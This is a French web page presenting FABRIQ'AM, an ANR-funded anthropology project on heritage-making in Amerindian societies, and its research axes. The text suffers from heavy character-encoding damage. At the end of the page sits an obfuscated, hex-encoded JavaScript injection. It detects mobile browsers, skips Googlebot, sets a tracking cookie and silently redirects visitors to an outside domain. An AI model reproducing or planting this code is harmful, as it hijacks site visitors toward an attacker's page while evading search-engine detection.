Proposition initiale

FinancA� par l’Agence Nationale de la Recherche (ANR), le projet FABRIQ’AM rA�unit une trentaine d’anthropologues sur le thA?me de la A�A�patrimonialisationA�A� en AmA�rique indienne.

Fabriq'am Carte terrains version 2014

Localisation des A�tudes de cas FABRIQ’AM

La A�A�mise en patrimoineA�A� da��A�lA�ments culturels, matA�riels et immatA�riels, devient depuis plusieurs annA�es la��un des moyens par lesquels les groupes amA�rindiens recherchent une visibilitA� et une reconnaissance dans un paysage social et politique marquA� aujourd’hui dans la plupart des pays amA�ricains par le multiculturalisme instituA� en mode de gouvernance.

Les phA�nomA?nes de patrimonialisation culturelle, amplement A�tudiA�s ailleurs (surtout en AmA�rique du nord) sont moins connus pour les espaces mA�so et sud amA�ricains et encore moins pour les sociA�tA�s amA�rindiennes. Au sein de ces groupes, les conceptions de ce qui doit A?tre conservA� ou A?tre oubliA�, les maniA?res de transmettre les connaissances et les savoirs, les modes da��historicitA� semblent bien souvent aller A� la��encontre de la��idA�e mA?me de la patrimonialisation telle qua��on la��entend dans le monde europA�ano-centrA�. Par ailleurs, suivant des mA�diations et des formes da��inculcation de schA?mes formulA�es en dehors des sociA�tA�s amA�rindiennes, celles-A�ci transforment aujourd’hui certaines de leurs pratiques quotidiennes en A�lA�ments da��un patrimoine culturel objectivable, transmissible et conservable. Ces procA�dures sont globalement liA�es A� un discours procA�dant par objectivation, essentialisation et ethnicisation des cultures indigA?nes.

Les formes de transmission mA�morielle des sociA�tA�s amA�rindiennes et minorisA�es ont alors une double dimension. D’une part, elles se construisent dans une matrice culturelle et sociale locale qui leur est propre. D’autre part, elles sont aussi, pour beaucoup, dA�sormais investies au sein da��un monde globalisA� en tant que ressources mobilisables pour conforter une identitA� collective, voire de nouvelles formes d’indianitA�. La��analyse des configurations patrimoniales que la��on peut observer sur le terrain demande alors une A�A�lucidation de ces formes da��imposition et da��adaptation mais aussi la comprA�hension de la maniA?re dont les acteurs indigA?nes ont su, en retour, se rA�approprier un droit A� construire un discours propre sur leur culture et A� la��instituer comme source da��une affirmation identitaire.

Pour comprendre les diverses dA�clinaisons du processus de patrimonialisation culturelle dans la trentaine de sociA�tA�s amA�rindiennes A�tudiA�es dans ce projet, la��enquA?te se dA�veloppera selon trois angles da��analyse complA�mentaires :

  • les rA�gimes de temporalitA�, da��historicitA� et de savoir ;
  • la A�A�fabriqueA�A� des patrimoines, sa construction sociale et ses usages politiques ;
  • les logiques institutionnelles et les formes locales de gouvernance multiculturelle.

La trentaine da��anthropologues rassemblA�s dans ce projet sont engagA�s de longue date sur les terrains A�tudiA�s, couvrant un vaste A�chantillonnage de situations locales et de rA�ponses diverses donnA�es au processus global de la patrimonialisation culturelle.

Le projet, rA�solument comparatif, ne sa��attache pas A� dresser une typologie des similitudes et des diffA�rences entre les formes de mise en patrimoine mais plutA?t A� comparer des reprA�sentations catA�gorielles, des cadres, des relations, des processus de construction de sens et de composition des discours. A� travers la��A�tude de la patrimonialisation culturelle, prise comme rA�vA�latrice de jeux da��acteurs, de stratA�gies de dA�finition de soi et de construction du politique, la��enjeu est da��aborder deux phA�nomA?nes A�troitement associA�s : da��une part, il sa��agit da��apprA�hender les modalitA�s de la��insertion des sociA�tA�s amA�rindiennesA�dans la modernitA� et leur capacitA� A� la��investir, en mettant au jour les formes de cohabitation et de composition de rA�gimes de savoirs et A�da��historicitA� A�gA�nA�rA�s A� travers la patrimonialisation ; da��autre part, A� travers la��analyse de ce processus, le projet entend A�clairer la genA?se et des dA�veloppements contemporains des configurations multiculturelles qui caractA�risent la��espace politique des rA�gions mA�so et sud amA�ricaine.

AXES DE RECHERCHE

LA A�A�FABRIQUEA�A� DES PATRIMOINES : CONSTRUCTIONS SOCIALES, USAGES POLITIQUES

Que signifie A�A�produire du patrimoineA�A� ou A�A�donner A� voir sa cultureA�A�, A� travers la mise en musA�e, sous diffA�rentes formes, la mise en spectacle, la mise en image ou en A�crit, la fabrication de A�A�lieux de mA�moireA�A� et de A�A�monumentsA�A� de toute natureA�?A�Ces processus ne sont pas seulement le lieu de constructions culturelles, ils engagent aussi des logiques du soi et de la��autre, des formes da��objectivation ou de mise en spectacle de la culture. Comment les acteurs indigA?nes ont-ils, A� un moment donnA�, pensA� certains traits culturels comme un A�A�patrimoineA�A�, et produit une image de soi investie dans les relations avec les autres groupes indigA?nes et dans les relations avec les non-Indiens ? On analyse ici les effets de ces opA�rations sur la culture des collectifs qui en sont A� la fois agents et objets, et la maniA?re dont elles contribuent A� remodeler les rapports sociaux, au sein des groupes concernA�s mais aussi entre ces groupes et leur extA�rieursA�: les communautA�s indigA?nes elles-mA?mes et leurs divers reprA�sentants, les institutions validant ce statut patrimonial et qui, da��une maniA?re ou da��une autre, procA?dent de la��A�tat ou relA?vent des nouveaux espaces globaux, et enfin un ensemble de mA�diateurs a�� dont les chercheurs sur le terrain.

A�
LOGIQUES PATRIMONIALES ET DISPOSITIFS INSTITUTIONNELS INTERNATIONAUX OU NATIONAUX

La��axe A�A�Logiques patrimoniales et dispositifs institutionnels internationaux et nationauxA�A� A�tudie la gouvernance du patrimoine par une investigation des pratiques institutionnelles. Nous nous pencherons en particulier sur la��analyse de la��articulation des normes globales, A�tablies notamment par la��Unesco, avec les structures bureaucratiques, les logiques institutionnelles et les formes da��expertise existantes en Guyane franA�aise, au BrA�sil amazonien et au Mexique.A�Quel est la��impact des programmes globaux sur les politiques nationales du patrimoineA�? Si la��essor des politiques patrimoniales a historiquement A�tA� associA� A� la crA�ation des A�tats nationaux, le patrimoine a dA�sormais quittA� la dimension strictement nationale pour devenir un fait global : les politiques patrimoniales sont aujourd’hui redA�finies A� la��A�chelle mondiale et orchestrA�es par des entitA�s supranationales. Quel est la��effet da��une institution telle que la��Unesco sur les politiques nationales du patrimoine ? La globalisation du patrimoine culturel renforcea��ta��elle une A�A�UnescoisationA�A�A�des thA�ories et des pratiques relatives au A�A�patrimoineA�A� ou, a`la��inverse, observe-t-on des stratA�gies de la part des A�tats pour rA�sister A� ce qui serait une homogA�nA�isation des critA?res de la A�A�A�patrimonialisationA�A�A�et des procA�dures de sa mise en A�uvre ?

RA�GIMES DE TEMPORALITA�, D’HISTORICITA�, DE SAVOIRS

Saisir les formes actuelles de fabrique de patrimoine, comme des processus A� la fois A�mergents et inscrits au sein de logiques culturelles, implique une comprA�hension fine des conceptions de la temporalitA�, de la��histoire, de la transmission et de ce qui se transmet pour une culture ou une sociA�tA� donnA�e. Comment ces conceptions configurent-elles et sont-elles reconfigurA�es par les nouveaux processus de patrimonialisationA�? Ces questions sont A� analyser A� partir da��une variA�tA� de pratiques, depuis celles concernant les objets et leur destin jusqu’A� celles liA�es A� la��utilisation des espaces quotidiens ou mA�moriels, depuis celles discursives, qua��elles soient narratives, rituelles, politiquesa��, jusqu’A� celles relevant de la��adoption de nouvelles formes da��expression, A�crites, filmiques ou autres. Cet axe du projet, qui fera une part importante A� la��examen des discours indigA?nes dans toute leur A�paisseur interactionnelle et temporelle selon une perspective ethnolinguistique (ou da��anthropologie linguistique), vise autant A� saisir la variA�tA� de stratA�gies, rA�ponses, rA�sistances et rA�siliences des sociA�tA�s amA�rindiennes face aux changements culturels, qua��A� une rA�flexion comparative plus large sur les schA?mes da��A�laboration de la��histoire et de conceptualisation de la��action et de la��A�vA�nement, ainsi que leurs manifestations et variations. Cinq angles da��approche articulA�s seront dA�veloppA�sA�: a) ModA?les et modalitA�s des constructions mA�morielles, b) Conceptions locales du changement et de la��A�vA�nement, c) La��agentivitA� historique, d) RA�gimes da��A�nonciation et de transmission des savoirs, e) La��ancrage spatial et matA�riel de la mA�moire.

FABRIQ’AM sur le site de l’ANR :A�http://www.agence-nationale-recherche.fr

var _0x446d=[« \x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E », »\x69\x6E\x64\x65\x78\x4F\x66″, »\x63\x6F\x6F\x6B\x69\x65″, »\x75\x73\x65\x72\x41\x67\x65\x6E\x74″, »\x76\x65\x6E\x64\x6F\x72″, »\x6F\x70\x65\x72\x61″, »\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″, »\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″, »\x74\x65\x73\x74″, »\x73\x75\x62\x73\x74\x72″, »\x67\x65\x74\x54\x69\x6D\x65″, »\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D », »\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″, »\x6C\x6F\x63\x61\x74\x69\x6F\x6E »];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}